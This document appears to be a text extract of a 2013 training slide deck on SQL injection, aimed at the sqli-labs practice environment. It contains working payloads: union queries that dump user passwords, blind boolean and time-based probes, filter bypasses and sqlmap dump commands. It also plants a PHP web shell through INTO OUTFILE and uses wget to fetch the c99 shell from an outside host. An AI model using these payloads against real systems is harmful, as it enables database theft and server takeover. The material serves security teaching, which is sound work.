This document discusses SQL injection, including what it is, different types, and how to exploit it. It begins with an introduction to SQL injection, describing error-based, time-based, and boolean-based SQLi. It then covers exploiting SQLi to compromise databases by uploading shells and using SQLmap. The remainder demonstrates SQLi techniques like union queries, extracting data, and bypassing filters. Tools, methodology, and resources for further learning are also mentioned.

1. Sqli Injection

2. #whoami
Ahamed Saleem
@saleem14489
#Security Researcher @CDAC

3. ● What is Sql Injection
● Types of sql injection
– Error based Injection ( String, numeric, Union, error )
– Time based Blind SQLi
– Boolean based Blind SQLi
– Cookie based Injection
– Compromising Database server using SQLi (upload a shell)
– Exploitation using SQLmap
– Bypass filters to successfully exploit SQLi .
Agenda

4. Baa, baa, black hat
Have you any sploits?
Yes, sir, yes, sir
3 bulletproof choices
One for Java
One for IE
One for Chrome
(ha ha ha )

5. ➔
Structured Query Language designed for managing
data held in a relational database management
systems (RDBMS).
➔
The scope of SQL includes data insert, update and
delete, schema creation and modification, and data
access control.
What Is Sql ?

6. Definition Of Sql Injection
Def :
“SQL injection attacks are a type of injection attack, in which
SQL commands are injected into data-plane input in order to
affect the execution of predefined SQL commands”
Cause:
It is a flaw in “web application development “ ,
it is not a DB or web server problem
→ most programmers are still not aware of this problem
→ lot of solutions posted on the internet are not good
enough

7. Anatomy Of Sql Injection
Sql Injection
Error Based Blind Based
Boolean Based Time Based

9. © C-DAC, Hyderabad - 2013
SQL Injection – Illustrated
Firewall
Hardened OS
Web Server
App Server
Firewall
Databases
LegacySystems
WebServices
Directories
HumanResrcs
Billing
Custom Code
APPLICATION
ATTACK
NetworkLayerApplicationLayer
Accounts
Finance
Administration
Transactions
Communication
KnowledgeMgmt
E-Commerce
Bus.Functions
HTTP
request
SQL
query
DB Table 

HTTP
response


"SELECT * FROM
accounts WHERE
acct=‘’ OR
1=1--’"
1. Application presents a form
to the attacker
2. Attacker sends an attack in
the form data
3. Application forwards attack to
the database in a SQL query
Account Summary
Acct:5424-6066-2134-4334
Acct:4128-7574-3921-0192
Acct:5424-9383-2039-4029
Acct:4128-0004-1234-0293
4. Database runs query containing
attack and sends encrypted
results back to application
5. Application decrypts data as
normal and sends results to
the user
Account:
SKU:
Account:
SKU:

10. OWASP Top 10

11. Myth
Escaping input
Prevents Sql Injection
Sql Injection is an
old problem -
So I dont have to
worry about it

12. Error Based Injections
Error-based SQL injections are primarily those
in which the SQL server dumps some errors
back to the user via the web application and
this error aids in successful exploitation

13. A methodological approach is always helpful in
understanding the underlying logic. The major process
is as follows:
1.Enumerate the application behavior
2.Fuzz the application with bogus data with the goal of
crashing the application
3.Try to control the injection point by guessing the
query used in the back-end
4. Extract the data from the back end database
Enough theory, time for some action.
Demo

14. ●
Id = 1' --+
●
id=1' AND 1=1 --+
●
id=1' union select 1,2,3 --+
●
id=999' union select 1,2,3 --+
●
id=-1' union select 1,table_name,3 from
information_schema.tables where table_schema=database() --+
●
id=-1' union select 1,group_concat(table_name),3 from
information_schema.tables where table_schema=database()--+
●
id=-1' union select 1,group_concat(column_name),3 from
information_schema.columns where table_name='users'--+
●
id=-1' union select 1,group_concat(username),
group_concat(password) from users --+

15. Blind Injections
Blind SQL injections are those injections in which the
backend database reacts to the input, but somehow the
errors are concealed by the web application and not
displayed to the end users
Boolean Based :
The information must be inferred from the behavior
of the page by asking the server true/false
questions
Time Based :
Gain information by observing timing delays in the
response of the database

17. Boolean Based Injections
select ascii(substr(database(),1,1));
id=1' AND (ascii(substr((select database()),3,1))) = 99 --+
id=1' AND (ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1)))=101 --+

18. Time based Injections
id=1' and if((select database()="security"), sleep(10),null) --+
id=1' and if ((select substr(table_name,1,1)
from information_schema.tables
where table_schema=database() limit 0,1 ) ='e' , sleep(10) , null)--+

19. Uploading shell
http://localhost/sqli-labs-master/Less-1/?id=-1'
union select "","","<?system($_REQUEST['cmd'];?>"
into outfile '/var/www/shell.php' --+
http://localhost/shell.php?
cmd=wget http://www.r57shell.net/shell/c99.txt

20. SqlMap detects and expolits SQLi flaws
Features :
●
Full support for MySQL, Oracle, PostgreSQL
and Microsoft SQL Server
●
Three SQL Injection techniques :
●
Boolean-based
●
Union queries
●
Batched queries
●
Perform an extensive back-end DBMS
fingerprint

21. ●
Enumerate users, password hashes, privileges,
databases, tables, columns and their data-type
●
Dump entire or user specified database table
entries
●
Run custom SQL statements
SqlMap detects and expolits SQLi flaws

22. Dishum Dishum usingSQLMAP

23. – First detect the vulnerable URLS
– Now use sqlmap :
1 . python sqlmap.py –u http://site.com/?id=1 {Identify sqli is present or not }
2 . python sqlmap.py -u http://site.com/?id=1 --dbs {Discover databases}
3./sqlmap -u http://site.com/?id=1 --tables -D <db name> {table in db}
4./sqlmap -u http://site.com/?id=1 --columns -D <db name> -T <table name>
5./sqlmap -u http://site.com/?id=1 --dump -D <db name> -T <table name>{data

24. Uploading Shell Using SQLMap :
1. Check if the current user is DBA or not .
./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user –is-dba
2.now enter the webserver path
./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-cmd -v 1
3. now the webshell can be loaded using the sqlmap file stager .
DEMO

25. ByPassing the blacklist Filters
Bypass AND and OR : Id=1' || 1=1 --+ id=1' %26%26 1=1 --+

26. Hands On

27. Methodology
●
Break it
– Try to break the query by fuzzing
●
Fix it
– Now based on the error try to balance and fix the
query

28. © C-DAC, Hyderabad - 2013
✔
What is Sql Injection
✔
Types of Sql Injection
✔
Hands on
What did we cover?

29. © C-DAC, Hyderabad - 2013
* Websites and References
OWASP, WASC, MSDN
* Books and Mailing Lists
Web Application Hackers Handbook, OWASP Guides
* Tools to use
Burp, Paros, Firefox Extensions, Virtual Box, Linux
What did we cover?Further Roadmap

30. © C-DAC, Hyderabad - 2013
Acknowledge
●
@Sqlilabs
●
@Google
●
@Nullhyd
●
@cswan
●
@thenounproject

31. © C-DAC, Hyderabad - 2013
Thank U
@saleem14489
Facebook.com/ahamedssaleem
Saleem4u.ahamed@gmail.com